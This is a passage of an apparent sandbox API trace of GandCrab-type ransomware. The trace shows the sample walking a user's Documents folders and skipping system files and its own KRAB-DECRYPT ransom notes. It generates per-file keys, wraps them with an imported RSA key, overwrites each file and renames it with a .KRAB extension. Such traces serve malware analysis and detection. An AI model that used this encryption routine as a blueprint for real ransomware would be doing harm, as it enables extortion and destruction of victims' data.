(lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\uHWX.ods") returned 101 [0090.002] lstrlenW (lpString=".ods") returned 4 [0090.002] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.002] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ods ") returned 5 [0090.002] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\uHWX.ods") returned 101 [0090.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\uHWX.ods") returned 101 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="desktop.ini") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="autorun.inf") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="ntuser.dat") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="iconcache.db") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="bootsect.bak") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="boot.ini") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="ntuser.dat.log") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="thumbs.db") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="KRAB-DECRYPT.html") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="ntldr") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="NTDETECT.COM") returned 1 [0090.003] lstrcmpiW (lpString1="uHWX.ods", lpString2="Bootfont.bin") returned 1 [0090.003] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.003] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010df8) returned 1 [0090.005] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0090.005] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.006] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.006] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0090.006] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0090.006] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.006] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10110a0) returned 1 [0090.008] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0090.008] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.009] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.009] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0090.009] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0090.009] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.009] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010bd8) returned 1 [0090.011] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10231f8) returned 1 [0090.011] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0090.011] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0090.011] GetLastError () returned 0x0 [0090.011] CryptDestroyKey (hKey=0x10231f8) returned 1 [0090.011] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.011] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010bd8) returned 1 [0090.013] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10231f8) returned 1 [0090.013] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0090.013] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0090.013] GetLastError () returned 0x0 [0090.013] CryptDestroyKey (hKey=0x10231f8) returned 1 [0090.013] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.013] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\uHWX.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\uhwx.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0090.014] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.014] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.014] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x5d9a, lpOverlapped=0x0) returned 1 [0090.030] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffffa266, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.030] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5d9a, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x5d9a, lpOverlapped=0x0) returned 1 [0090.031] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0090.031] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.035] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.035] CloseHandle (hObject=0x7ec) returned 1 [0090.035] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.035] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\uHWX.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\uhwx.ods"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\uHWX.ods.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\uhwx.ods.krab")) returned 1 [0090.036] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.037] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0090.037] lstrcmpW (lpString1="WSFj_3kH8.doc", lpString2=".") returned 1 [0090.037] lstrcmpW (lpString1="WSFj_3kH8.doc", lpString2="..") returned 1 [0090.037] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="WSFj_3kH8.doc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\WSFj_3kH8.doc") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\WSFj_3kH8.doc" [0090.037] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.037] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\WSFj_3kH8.doc.KRAB") returned 111 [0090.037] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\WSFj_3kH8.doc") returned 106 [0090.037] lstrlenW (lpString=".doc") returned 4 [0090.037] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.037] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".doc ") returned 5 [0090.038] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.043] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\WSFj_3kH8.doc") returned 106 [0090.044] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\WSFj_3kH8.doc") returned 106 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="desktop.ini") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="autorun.inf") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="ntuser.dat") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="iconcache.db") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="bootsect.bak") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="boot.ini") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="ntuser.dat.log") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="thumbs.db") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="KRAB-DECRYPT.html") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="ntldr") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="NTDETECT.COM") returned 1 [0090.044] lstrcmpiW (lpString1="WSFj_3kH8.doc", lpString2="Bootfont.bin") returned 1 [0090.044] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.045] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011678) returned 1 [0090.046] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.047] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.047] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.047] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0090.047] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0090.047] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.047] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011018) returned 1 [0090.049] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.049] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.049] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.049] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0090.049] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0090.050] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.050] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010bd8) returned 1 [0090.051] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023338) returned 1 [0090.051] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0090.051] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0090.052] GetLastError () returned 0x0 [0090.052] CryptDestroyKey (hKey=0x1023338) returned 1 [0090.052] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.052] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10112c0) returned 1 [0090.061] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023338) returned 1 [0090.061] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0090.061] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0090.061] GetLastError () returned 0x0 [0090.061] CryptDestroyKey (hKey=0x1023338) returned 1 [0090.061] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0090.061] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\WSFj_3kH8.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\wsfj_3kh8.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0090.062] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.062] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.063] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x11f87, lpOverlapped=0x0) returned 1 [0090.106] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffee079, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.107] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x11f87, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x11f87, lpOverlapped=0x0) returned 1 [0090.107] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0090.107] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.113] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.113] CloseHandle (hObject=0x7ec) returned 1 [0090.114] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.114] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\WSFj_3kH8.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\wsfj_3kh8.doc"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\WSFj_3kH8.doc.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\wsfj_3kh8.doc.krab")) returned 1 [0090.115] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.115] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0090.115] FindClose (in: hFindFile=0x10234f8 | out: hFindFile=0x10234f8) returned 1 [0090.115] CloseHandle (hObject=0x774) returned 1 [0090.115] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0090.115] lstrcmpW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2=".") returned 1 [0090.115] lstrcmpW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="..") returned 1 [0090.115] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\", lpString2="K56FGI8e_qPk7EgE.xls" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\K56FGI8e_qPk7EgE.xls") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\K56FGI8e_qPk7EgE.xls" [0090.115] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.116] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\K56FGI8e_qPk7EgE.xls.KRAB") returned 109 [0090.116] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\K56FGI8e_qPk7EgE.xls") returned 104 [0090.116] lstrlenW (lpString=".xls") returned 4 [0090.116] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.116] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xls ") returned 5 [0090.116] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.117] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\K56FGI8e_qPk7EgE.xls") returned 104 [0090.117] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\K56FGI8e_qPk7EgE.xls") returned 104 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="desktop.ini") returned 1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="autorun.inf") returned 1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="ntuser.dat") returned -1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="iconcache.db") returned 1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="bootsect.bak") returned 1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="boot.ini") returned 1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="ntuser.dat.log") returned -1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="thumbs.db") returned -1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="KRAB-DECRYPT.html") returned -1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="ntldr") returned -1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="NTDETECT.COM") returned -1 [0090.117] lstrcmpiW (lpString1="K56FGI8e_qPk7EgE.xls", lpString2="Bootfont.bin") returned 1 [0090.117] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.118] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1011458) returned 1 [0090.119] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.123] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.123] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.123] CryptGenRandom (in: hProv=0x1011458, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0090.125] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0090.125] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.125] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1010df8) returned 1 [0090.127] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.127] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.128] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.129] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0090.129] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0090.130] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.162] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x1011898) returned 1 [0090.164] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x1023338) returned 1 [0090.164] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0090.164] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0090.165] GetLastError () returned 0x0 [0090.165] CryptDestroyKey (hKey=0x1023338) returned 1 [0090.165] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0090.165] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x10114e0) returned 1 [0090.166] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x10235f8) returned 1 [0090.167] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0090.167] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0090.167] GetLastError () returned 0x0 [0090.167] CryptDestroyKey (hKey=0x10235f8) returned 1 [0090.167] 